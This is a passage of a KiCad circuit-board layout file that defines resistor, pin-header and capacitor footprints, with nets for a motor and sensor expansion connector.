F.SilkS) (width 0.12)) (fp_line (start 0.88 0) (end 1.95 0) (layer F.SilkS) (width 0.12)) (fp_line (start 5.67 -0.86) (end 1.95 -0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 5.67 0.86) (end 5.67 -0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 1.95 0.86) (end 5.67 0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 1.95 -0.86) (end 1.95 0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 7.62 0) (end 5.61 0) (layer F.Fab) (width 0.1)) (fp_line (start 0 0) (end 2.01 0) (layer F.Fab) (width 0.1)) (fp_line (start 5.61 -0.8) (end 2.01 -0.8) (layer F.Fab) (width 0.1)) (fp_line (start 5.61 0.8) (end 5.61 -0.8) (layer F.Fab) (width 0.1)) (fp_line (start 2.01 0.8) (end 5.61 0.8) (layer F.Fab) (width 0.1)) (fp_line (start 2.01 -0.8) (end 2.01 0.8) (layer F.Fab) (width 0.1)) (pad 1 thru_hole circle (at 0 0 270) (size 1.4 1.4) (drill 0.7) (layers *.Cu *.Mask) (net 15 +5V)) (pad 2 thru_hole oval (at 7.62 0 270) (size 1.4 1.4) (drill 0.7) (layers *.Cu *.Mask) (net 31 /SENSE1)) (model ${KISYS3DMOD}/Resistors_THT.3dshapes/R_Axial_DIN0204_L3.6mm_D1.6mm_P7.62mm_Horizontal.wrl (at (xyz 0 0 0)) (scale (xyz 0.393701 0.393701 0.393701)) (rotate (xyz 0 0 0)) ) ) (module Resistors_ThroughHole:R_Axial_DIN0204_L3.6mm_D1.6mm_P7.62mm_Horizontal (layer F.Cu) (tedit 5B92F185) (tstamp 59E05A60) (at 22.352 33.782) (descr "Resistor, Axial_DIN0204 series, Axial, Horizontal, pin pitch=7.62mm, 0.16666666666666666W = 1/6W, length*diameter=3.6*1.6mm^2, http://cdn-reichelt.de/documents/datenblatt/B400/1_4W%23YAG.pdf") (tags "Resistor Axial_DIN0204 series Axial Horizontal pin pitch 7.62mm 0.16666666666666666W = 1/6W length 3.6mm diameter 1.6mm") (path /57148460) (fp_text reference R1 (at 7.62 -1.778) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 2.2k (at 3.81 0) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 8.6 -1.15) (end -0.95 -1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start 8.6 1.15) (end 8.6 -1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.95 1.15) (end 8.6 1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.95 -1.15) (end -0.95 1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start 6.74 0) (end 5.67 0) (layer F.SilkS) (width 0.12)) (fp_line (start 0.88 0) (end 1.95 0) (layer F.SilkS) (width 0.12)) (fp_line (start 5.67 -0.86) (end 1.95 -0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 5.67 0.86) (end 5.67 -0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 1.95 0.86) (end 5.67 0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 1.95 -0.86) (end 1.95 0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 7.62 0) (end 5.61 0) (layer F.Fab) (width 0.1)) (fp_line (start 0 0) (end 2.01 0) (layer F.Fab) (width 0.1)) (fp_line (start 5.61 -0.8) (end 2.01 -0.8) (layer F.Fab) (width 0.1)) (fp_line (start 5.61 0.8) (end 5.61 -0.8) (layer F.Fab) (width 0.1)) (fp_line (start 2.01 0.8) (end 5.61 0.8) (layer F.Fab) (width 0.1)) (fp_line (start 2.01 -0.8) (end 2.01 0.8) (layer F.Fab) (width 0.1)) (pad 1 thru_hole circle (at 0 0) (size 1.4 1.4) (drill 0.7) (layers *.Cu *.Mask) (net 18 "Net-(D1-Pad2)")) (pad 2 thru_hole oval (at 7.62 0) (size 1.4 1.4) (drill 0.7) (layers *.Cu *.Mask) (net 45 +12V)) (model ${KISYS3DMOD}/Resistors_THT.3dshapes/R_Axial_DIN0204_L3.6mm_D1.6mm_P7.62mm_Horizontal.wrl (at (xyz 0 0 0)) (scale (xyz 0.393701 0.393701 0.393701)) (rotate (xyz 0 0 0)) ) ) (module Resistors_ThroughHole:R_Axial_DIN0204_L3.6mm_D1.6mm_P7.62mm_Horizontal (layer F.Cu) (tedit 5B723C6D) (tstamp 59E05A89) (at 29.972 44.196 90) (descr "Resistor, Axial_DIN0204 series, Axial, Horizontal, pin pitch=7.62mm, 0.16666666666666666W = 1/6W, length*diameter=3.6*1.6mm^2, http://cdn-reichelt.de/documents/datenblatt/B400/1_4W%23YAG.pdf") (tags "Resistor Axial_DIN0204 series Axial Horizontal pin pitch 7.62mm 0.16666666666666666W = 1/6W length 3.6mm diameter 1.6mm") (path /59D78B1C) (fp_text reference R7 (at 7.874 -2.286 180) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 220 (at 3.81 0 90) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 8.6 -1.15) (end -0.95 -1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start 8.6 1.15) (end 8.6 -1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.95 1.15) (end 8.6 1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.95 -1.15) (end -0.95 1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start 6.74 0) (end 5.67 0) (layer F.SilkS) (width 0.12)) (fp_line (start 0.88 0) (end 1.95 0) (layer F.SilkS) (width 0.12)) (fp_line (start 5.67 -0.86) (end 1.95 -0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 5.67 0.86) (end 5.67 -0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 1.95 0.86) (end 5.67 0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 1.95 -0.86) (end 1.95 0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 7.62 0) (end 5.61 0) (layer F.Fab) (width 0.1)) (fp_line (start 0 0) (end 2.01 0) (layer F.Fab) (width 0.1)) (fp_line (start 5.61 -0.8) (end 2.01 -0.8) (layer F.Fab) (width 0.1)) (fp_line (start 5.61 0.8) (end 5.61 -0.8) (layer F.Fab) (width 0.1)) (fp_line (start 2.01 0.8) (end 5.61 0.8) (layer F.Fab) (width 0.1)) (fp_line (start 2.01 -0.8) (end 2.01 0.8) (layer F.Fab) (width 0.1)) (pad 1 thru_hole circle (at 0 0 90) (size 1.4 1.4) (drill 0.7) (layers *.Cu *.Mask) (net 19 "Net-(D2-Pad2)")) (pad 2 thru_hole oval (at 7.62 0 90) (size 1.4 1.4) (drill 0.7) (layers *.Cu *.Mask) (net 15 +5V)) (model ${KISYS3DMOD}/Resistors_THT.3dshapes/R_Axial_DIN0204_L3.6mm_D1.6mm_P7.62mm_Horizontal.wrl (at (xyz 0 0 0)) (scale (xyz 0.393701 0.393701 0.393701)) (rotate (xyz 0 0 0)) ) ) (module Resistors_ThroughHole:R_Axial_DIN0204_L3.6mm_D1.6mm_P7.62mm_Horizontal (layer F.Cu) (tedit 5B92F215) (tstamp 59E05AB2) (at 73.152 30.48 270) (descr "Resistor, Axial_DIN0204 series, Axial, Horizontal, pin pitch=7.62mm, 0.16666666666666666W = 1/6W, length*diameter=3.6*1.6mm^2, http://cdn-reichelt.de/documents/datenblatt/B400/1_4W%23YAG.pdf") (tags "Resistor Axial_DIN0204 series Axial Horizontal pin pitch 7.62mm 0.16666666666666666W = 1/6W length 3.6mm diameter 1.6mm") (path /59DAC74F) (fp_text reference R9 (at 7.874 2.286) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 470 (at 3.81 0 270) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 8.6 -1.15) (end -0.95 -1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start 8.6 1.15) (end 8.6 -1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.95 1.15) (end 8.6 1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start -0.95 -1.15) (end -0.95 1.15) (layer F.CrtYd) (width 0.05)) (fp_line (start 6.74 0) (end 5.67 0) (layer F.SilkS) (width 0.12)) (fp_line (start 0.88 0) (end 1.95 0) (layer F.SilkS) (width 0.12)) (fp_line (start 5.67 -0.86) (end 1.95 -0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 5.67 0.86) (end 5.67 -0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 1.95 0.86) (end 5.67 0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 1.95 -0.86) (end 1.95 0.86) (layer F.SilkS) (width 0.12)) (fp_line (start 7.62 0) (end 5.61 0) (layer F.Fab) (width 0.1)) (fp_line (start 0 0) (end 2.01 0) (layer F.Fab) (width 0.1)) (fp_line (start 5.61 -0.8) (end 2.01 -0.8) (layer F.Fab) (width 0.1)) (fp_line (start 5.61 0.8) (end 5.61 -0.8) (layer F.Fab) (width 0.1)) (fp_line (start 2.01 0.8) (end 5.61 0.8) (layer F.Fab) (width 0.1)) (fp_line (start 2.01 -0.8) (end 2.01 0.8) (layer F.Fab) (width 0.1)) (pad 1 thru_hole circle (at 0 0 270) (size 1.4 1.4) (drill 0.7) (layers *.Cu *.Mask) (net 38 "Net-(R9-Pad1)")) (pad 2 thru_hole oval (at 7.62 0 270) (size 1.4 1.4) (drill 0.7) (layers *.Cu *.Mask) (net 25 /DBGLED_IN)) (model ${KISYS3DMOD}/Resistors_THT.3dshapes/R_Axial_DIN0204_L3.6mm_D1.6mm_P7.62mm_Horizontal.wrl (at (xyz 0 0 0)) (scale (xyz 0.393701 0.393701 0.393701)) (rotate (xyz 0 0 0)) ) ) (module PinHeaders:Pin_Header_Straight_1x04 (layer F.Cu) (tedit 5B96E38E) (tstamp 59E19D41) (at 103.124 60.198 180) (descr "Through hole pin header") (tags "pin header") (path /59E1C132) (attr virtual) (fp_text reference P10 (at 0 -2.032) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value CONN_01X04 (at 0 -3.1 180) (layer F.Fab) hide (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start -1.2 -1.2) (end 1.2 -1.2) (layer F.SilkS) (width 0.15)) (fp_line (start 1.2 -1.2) (end 1.2 8.82) (layer F.SilkS) (width 0.15)) (fp_line (start -1.2 -1.2) (end -1.2 8.82) (layer F.SilkS) (width 0.15)) (fp_line (start -1.2 8.82) (end 1.2 8.82) (layer F.SilkS) (width 0.15)) (pad 1 thru_hole rect (at 0 0 180) (size 1.75 1.75) (drill 1) (layers *.Cu *.Mask F.SilkS) (net 39 "Net-(P10-Pad1)")) (pad 2 thru_hole oval (at 0 2.54 180) (size 1.75 1.75) (drill 1) (layers *.Cu *.Mask F.SilkS) (net 40 "Net-(P10-Pad2)")) (pad 3 thru_hole oval (at 0 5.08 180) (size 1.75 1.75) (drill 1) (layers *.Cu *.Mask F.SilkS) (net 41 "Net-(P10-Pad3)")) (pad 4 thru_hole oval (at 0 7.62 180) (size 1.75 1.75) (drill 1) (layers *.Cu *.Mask F.SilkS) (net 42 "Net-(P10-Pad4)")) (model Pin_Headers.3dshapes/Pin_Header_Straight_1x04.wrl (offset (xyz 0 -3.809999942779541 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 90)) ) ) (module PinHeaders:Pin_Header_Straight_2x07_Pitch2.54mm_IDC_Shrouded (layer F.Cu) (tedit 59E99533) (tstamp 59E2FBB3) (at 34.544 34.29) (descr "Through hole straight pin header, 2x07, 2.54mm pitch, double rows") (tags "Through hole pin header THT 2x07 2.54mm double row") (path /59D46D4B) (fp_text reference J1 (at 1.27 -2.33) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value "EXP. IN" (at 1.524 21.082) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 4.35 -1.8) (end -1.8 -1.8) (layer F.CrtYd) (width 0.05)) (fp_line (start 4.35 17.05) (end 4.35 -1.8) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.8 17.05) (end 4.35 17.05) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.8 -1.8) (end -1.8 17.05) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.33 -1.33) (end 0 -1.33) (layer F.SilkS) (width 0.12)) (fp_line (start -1.33 0) (end -1.33 -1.33) (layer F.SilkS) (width 0.12)) (fp_line (start 1.27 -1.33) (end 3.87 -1.33) (layer F.SilkS) (width 0.12)) (fp_line (start 1.27 1.27) (end 1.27 -1.33) (layer F.SilkS) (width 0.12)) (fp_line (start -1.33 1.27) (end 1.27 1.27) (layer F.SilkS) (width 0.12)) (fp_line (start 3.87 -1.33) (end 3.87 16.57) (layer F.SilkS) (width 0.12)) (fp_line (start -1.33 1.27) (end -1.33 16.57) (layer F.SilkS) (width 0.12)) (fp_line (start -1.33 16.57) (end 3.87 16.57) (layer F.SilkS) (width 0.12)) (fp_line (start -1.27 0) (end 0 -1.27) (layer F.Fab) (width 0.1)) (fp_line (start -1.27 16.51) (end -1.27 0) (layer F.Fab) (width 0.1)) (fp_line (start 3.81 16.51) (end -1.27 16.51) (layer F.Fab) (width 0.1)) (fp_line (start 3.81 -1.27) (end 3.81 16.51) (layer F.Fab) (width 0.1)) (fp_line (start 0 -1.27) (end 3.81 -1.27) (layer F.Fab) (width 0.1)) (fp_line (start 5.82 -5.08) (end 5.82 20.32) (layer F.SilkS) (width 0.15)) (fp_line (start -3.28 -5.08) (end 5.82 -5.08) (layer F.SilkS) (width 0.15)) (fp_line (start -3.28 20.32) (end -3.28 -5.08) (layer F.SilkS) (width 0.15)) (fp_line (start 5.82 20.32) (end -3.28 20.32) (layer F.SilkS) (width 0.15)) (fp_line (start -2.3 9.87) (end -3.28 9.87) (layer F.SilkS) (width 0.15)) (fp_line (start -2.3 5.37) (end -2.3 9.87) (layer F.SilkS) (width 0.15)) (fp_line (start -3.28 5.37) (end -2.3 5.37) (layer F.SilkS) (width 0.15)) (fp_text user %R (at 1.27 7.62 90) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (pad 1 thru_hole rect (at 0 0) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 45 +12V)) (pad 2 thru_hole oval (at 2.54 0) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 45 +12V)) (pad 3 thru_hole oval (at 0 2.54) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 1 GND)) (pad 4 thru_hole oval (at 2.54 2.54) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 1 GND)) (pad 5 thru_hole oval (at 0 5.08) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 15 +5V)) (pad 6 thru_hole oval (at 2.54 5.08) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 15 +5V)) (pad 7 thru_hole oval (at 0 7.62) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 20 /MOTOR_DATA_IN)) (pad 8 thru_hole oval (at 2.54 7.62) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 21 /MOTOR_LATCH)) (pad 9 thru_hole oval (at 0 10.16) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 22 /SENSOR_DATA_OUT)) (pad 10 thru_hole oval (at 2.54 10.16) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 23 /SENSOR_LATCH)) (pad 11 thru_hole oval (at 0 12.7) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 24 /SPI_CLOCK)) (pad 12 thru_hole oval (at 2.54 12.7) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask) (net 25 /DBGLED_IN)) (pad 13 thru_hole oval (at 0 15.24) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (pad 14 thru_hole oval (at 2.54 15.24) (size 1.7 1.7) (drill 1) (layers *.Cu *.Mask)) (model ${KISYS3DMOD}/Pin_Headers.3dshapes/Pin_Header_Straight_2x07_Pitch2.54mm.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module Capacitors_ThroughHole:CP_Radial_D8.0mm_P3.50mm (layer F.Cu) (tedit 5B92F203) (tstamp 59E4408F) (at 48.768 54.864 180) (descr "CP, Radial series, Radial, pin pitch=3.50mm, , diameter=8mm, Electrolytic Capacitor") (tags "CP Radial series Radial pin pitch 3.50mm diameter 8mm Electrolytic Capacitor") (path /59E44C8C) (fp_text reference C3 (at 5.08 -4.826) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 100uF (at 1.27 -4.826 180) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 6.1 -4.35) (end -2.6 -4.35) (layer F.CrtYd) (width 0.05)) (fp_line (start 6.1 4.35) (end 6.1 -4.35) (layer F.CrtYd) (width 0.05)) (fp_line (start -2.6 4.35) (end 6.1 4.35) (layer F.CrtYd) (width 0.05)) (fp_line (start -2.6 -4.35) (end -2.6 4.35) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.6 -0.65) (end -1.6 0.65) (layer F.SilkS) (width 0.12)) (fp_line (start -2.2 0) (end -1 0) (layer F.SilkS) (width 0.12)) (fp_line (start 5.831 -0.246) (end 5.831 0.246) (layer F.SilkS) (width 0.12)) (fp_line (start 5.791 -0.598) (end 5.791 0.598) (layer F.SilkS) (width 0.12)) (fp_line (start 5.751 -0.814) (end 5.751 0.814) (layer F.SilkS) (width 0.12)) (fp_line (start 5.711 -0.983) (end 5.711 0.983) (layer F.SilkS) (width 0.12)) (fp_line (start 5.671 -1.127) (end 5.671 1.127) (layer F.SilkS) (width 0.12)) (fp_line (start 5.631 -1.254) (end 5.631 1.254) (layer F.SilkS) (width 0.12)) (fp_line (start 5.591 -1.369) (end 5.591 1.369) (layer F.SilkS) (width 0.12)) (fp_line (start 5.551 -1.473) (end 5.551 1.473) (layer F.SilkS) (width 0.12)) (fp_line (start 5.511 -1.57) (end 5.511 1.57) (layer F.SilkS) (width 0.12)) (fp_line (start 5.471 -1.66) (end 5.471 1.66) (layer F.SilkS) (width 0.12)) (fp_line (start 5.431 -1.745) (end 5.431 1.745) (layer F.SilkS) (width 0.12)) (fp_line (start 5.391 -1.826) (end 5.391 1.826) (layer F.SilkS) (width 0.12)) (fp_line (start 5.351 -1.902) (end 5.351 1.902) (layer F.SilkS) (width 0.12)) (fp_line (start 5.311 -1.974) (end 5.311 1.974) (layer F.SilkS) (width 0.12)) (fp_line (start 5.271 -2.043) (end 5.271 2.043) (layer F.SilkS) (width 0.12)) (fp_line (start 5.231 -2.109) (end 5.231 2.109) (layer F.SilkS) (width 0.12)) (fp_line (start 5.191 -2.173) (end 5.191 2.173) (layer F.SilkS) (width 0.12)) (fp_line (start 5.151 -2.234) (end 5.151 2.234) (layer F.SilkS) (width 0.12)) (fp_line (start 5.111 -2.293) (end 5.111 2.293) (layer F.SilkS) (width 0.12)) (fp_line (start 5.071 -2.349) (end 5.071 2.349) (layer F.SilkS) (width 0.12)) (fp_line (start 5.031 -2.404) (end 5.031 2.404) (layer F.SilkS) (width 0.12)) (fp_line (start 4.991 -2.457) (end 4.991 2.457) (layer F.SilkS) (width 0.12)) (fp_line (start 4.951 -2.508) (end 4.951 2.508) (layer F.SilkS) (width 0.12)) (fp_line (start 4.911 -2.557) (end 4.911 2.557) (layer F.SilkS) (width 0.12)) (fp_line (start 4.871 -2.605) (end 4.871 2.605) (layer F.SilkS) (width 0.12)) (fp_line (start 4.831 -2.652) (end 4.831 2.652) (layer F.SilkS) (width 0.12)) (fp_line (start 4.791 -2.697) (end 4.791 2.697) (layer F.SilkS) (width 0.12)) (fp_line (start 4.751 -2.74) (end 4.751 2.74) (layer F.SilkS) (width 0.12)) (fp_line (start 4.711 -2.783) (end 4.711 2.783) (layer F.SilkS) (width 0.12)) (fp_line (start 4.671 -2.824) (end 4.671 2.824) (layer F.SilkS) (width 0.12)) (fp_line (start 4.631 -2.865) (end 4.631 2.865) (layer F.SilkS) (width 0.12)) (fp_line (start 4.591 -2.904) (end 4.591 2.904) (layer F.SilkS) (width 0.12)) (fp_line (start 4.551 -2.942) (end 4.551 2.942) (layer F.SilkS) (width 0.12)) (fp_line (start 4.511 -2.979) (end 4.511 2.979) (layer F.SilkS) (width 0.12)) (fp_line (start 4.471 0.98) (end 4.471 3.015) (layer F.SilkS) (width 0.12)) (fp_line (start 4.471 -3.015) (end 4.471 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.431 0.98) (end 4.431 3.05) (layer F.SilkS) (width 0.12)) (fp_line (start 4.431 -3.05) (end 4.431 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.391 0.98) (end 4.391 3.084) (layer F.SilkS) (width 0.12)) (fp_line (start 4.391 -3.084) (end 4.391 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.351 0.98) (end 4.351 3.118) (layer F.SilkS) (width 0.12)) (fp_line (start 4.351 -3.118) (end 4.351 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.311 0.98) (end 4.311 3.15) (layer F.SilkS) (width 0.12)) (fp_line (start 4.311 -3.15) (end 4.311 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.271 0.98) (end 4.271 3.182) (layer F.SilkS) (width 0.12)) (fp_line (start 4.271 -3.182) (end 4.271 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.231 0.98) (end 4.231 3.213) (layer F.SilkS) (width 0.12)) (fp_line (start 4.231 -3.213) (end 4.231 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.191 0.98) (end 4.191 3.243) (layer F.SilkS) (width 0.12)) (fp_line (start 4.191 -3.243) (end 4.191 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.151 0.98) (end 4.151 3.272) (layer F.SilkS) (width 0.12)) (fp_line (start 4.151 -3.272) (end 4.151 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.111 0.98) (end 4.111 3.301) (layer F.SilkS) (width 0.12)) (fp_line (start 4.111 -3.301) (end 4.111 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.071 0.98) (end 4.071 3.329) (layer F.SilkS) (width 0.12)) (fp_line (start 4.071 -3.329) (end 4.071 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 4.031 0.98) (end 4.031 3.356) (layer F.SilkS) (width 0.12)) (fp_line (start 4.031 -3.356) (end 4.031 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.991 0.98) (end 3.991 3.383) (layer F.SilkS) (width 0.12)) (fp_line (start 3.991 -3.383) (end 3.991 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.951 0.98) (end 3.951 3.408) (layer F.SilkS) (width 0.12)) (fp_line (start 3.951 -3.408) (end 3.951 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.911 0.98) (end 3.911 3.434) (layer F.SilkS) (width 0.12)) (fp_line (start 3.911 -3.434) (end 3.911 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.871 0.98) (end 3.871 3.458) (layer F.SilkS) (width 0.12)) (fp_line (start 3.871 -3.458) (end 3.871 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.831 0.98) (end 3.831 3.482) (layer F.SilkS) (width 0.12)) (fp_line (start 3.831 -3.482) (end 3.831 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.791 0.98) (end 3.791 3.505) (layer F.SilkS) (width 0.12)) (fp_line (start 3.791 -3.505) (end 3.791 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.751 0.98) (end 3.751 3.528) (layer F.SilkS) (width 0.12)) (fp_line (start 3.751 -3.528) (end 3.751 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.711 0.98) (end 3.711 3.55) (layer F.SilkS) (width 0.12)) (fp_line (start 3.711 -3.55) (end 3.711 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.671 0.98) (end 3.671 3.572) (layer F.SilkS) (width 0.12)) (fp_line (start 3.671 -3.572) (end 3.671 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.631 0.98) (end 3.631 3.593) (layer F.SilkS) (width 0.12)) (fp_line (start 3.631 -3.593) (end 3.631 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.591 0.98) (end 3.591 3.613) (layer F.SilkS) (width 0.12)) (fp_line (start 3.591 -3.613) (end 3.591 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.551 0.98) (end 3.551 3.633) (layer F.SilkS) (width 0.12)) (fp_line (start 3.551 -3.633) (end 3.551 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.511 0.98) (end 3.511 3.652) (layer F.SilkS) (width 0.12)) (fp_line (start 3.511 -3.652) (end 3.511 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.471 0.98) (end 3.471 3.671) (layer F.SilkS) (width 0.12)) (fp_line (start 3.471 -3.671) (end 3.471 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.431 0.98) (end 3.431 3.69) (layer F.SilkS) (width 0.12)) (fp_line (start 3.431 -3.69) (end 3.431 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.391 0.98) (end 3.391 3.707) (layer F.SilkS) (width 0.12)) (fp_line (start 3.391 -3.707) (end 3.391 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.351 0.98) (end 3.351 3.725) (layer F.SilkS) (width 0.12)) (fp_line (start 3.351 -3.725) (end 3.351 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.311 0.98) (end 3.311 3.741) (layer F.SilkS) (width 0.12)) (fp_line (start 3.311 -3.741) (end 3.311 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.271 0.98) (end 3.271 3.758) (layer F.SilkS) (width 0.12)) (fp_line (start 3.271 -3.758) (end 3.271 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.231 0.98) (end 3.231 3.773) (layer F.SilkS) (width 0.12)) (fp_line (start 3.231 -3.773) (end 3.231 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.191 0.98) (end 3.191 3.789) (layer F.SilkS) (width 0.12)) (fp_line (start 3.191 -3.789) (end 3.191 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.151 0.98) (end 3.151 3.803) (layer F.SilkS) (width 0.12)) (fp_line (start 3.151 -3.803) (end 3.151 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.111 0.98) (end 3.111 3.818) (layer F.SilkS) (width 0.12)) (fp_line (start 3.111 -3.818) (end 3.111 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.071 0.98) (end 3.071 3.832) (layer F.SilkS) (width 0.12)) (fp_line (start 3.071 -3.832) (end 3.071 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 3.031 0.98) (end 3.031 3.845) (layer F.SilkS) (width 0.12)) (fp_line (start 3.031 -3.845) (end 3.031 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.991 0.98) (end 2.991 3.858) (layer F.SilkS) (width 0.12)) (fp_line (start 2.991 -3.858) (end 2.991 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.951 0.98) (end 2.951 3.87) (layer F.SilkS) (width 0.12)) (fp_line (start 2.951 -3.87) (end 2.951 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.911 0.98) (end 2.911 3.883) (layer F.SilkS) (width 0.12)) (fp_line (start 2.911 -3.883) (end 2.911 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.871 0.98) (end 2.871 3.894) (layer F.SilkS) (width 0.12)) (fp_line (start 2.871 -3.894) (end 2.871 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.831 0.98) (end 2.831 3.905) (layer F.SilkS) (width 0.12)) (fp_line (start 2.831 -3.905) (end 2.831 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.791 0.98) (end 2.791 3.916) (layer F.SilkS) (width 0.12)) (fp_line (start 2.791 -3.916) (end 2.791 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.751 0.98) (end 2.751 3.926) (layer F.SilkS) (width 0.12)) (fp_line (start 2.751 -3.926) (end 2.751 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.711 0.98) (end 2.711 3.936) (layer F.SilkS) (width 0.12)) (fp_line (start 2.711 -3.936) (end 2.711 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.671 0.98) (end 2.671 3.946) (layer F.SilkS) (width 0.12)) (fp_line (start 2.671 -3.946) (end 2.671 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.631 0.98) (end 2.631 3.955) (layer F.SilkS) (width 0.12)) (fp_line (start 2.631 -3.955) (end 2.631 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.591 0.98) (end 2.591 3.963) (layer F.SilkS) (width 0.12)) (fp_line (start 2.591 -3.963) (end 2.591 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.551 0.98) (end 2.551 3.971) (layer F.SilkS) (width 0.12)) (fp_line (start 2.551 -3.971) (end 2.551 -0.98) (layer F.SilkS) (width 0.12)) (fp_line (start 2.511 -3.979) (end 2.511 3.979) (layer F.SilkS) (width 0.12)) (fp_line (start 2.471 -3.987) (end 2.471 3.987) (layer F.SilkS) (width 0.12)) (fp_line (start 2.43 -3.994) (end 2.43 3.994) (layer F.SilkS) (width 0.12)) (fp_line (start 2.39 -4) (end 2.39 4) (layer F.SilkS) (width 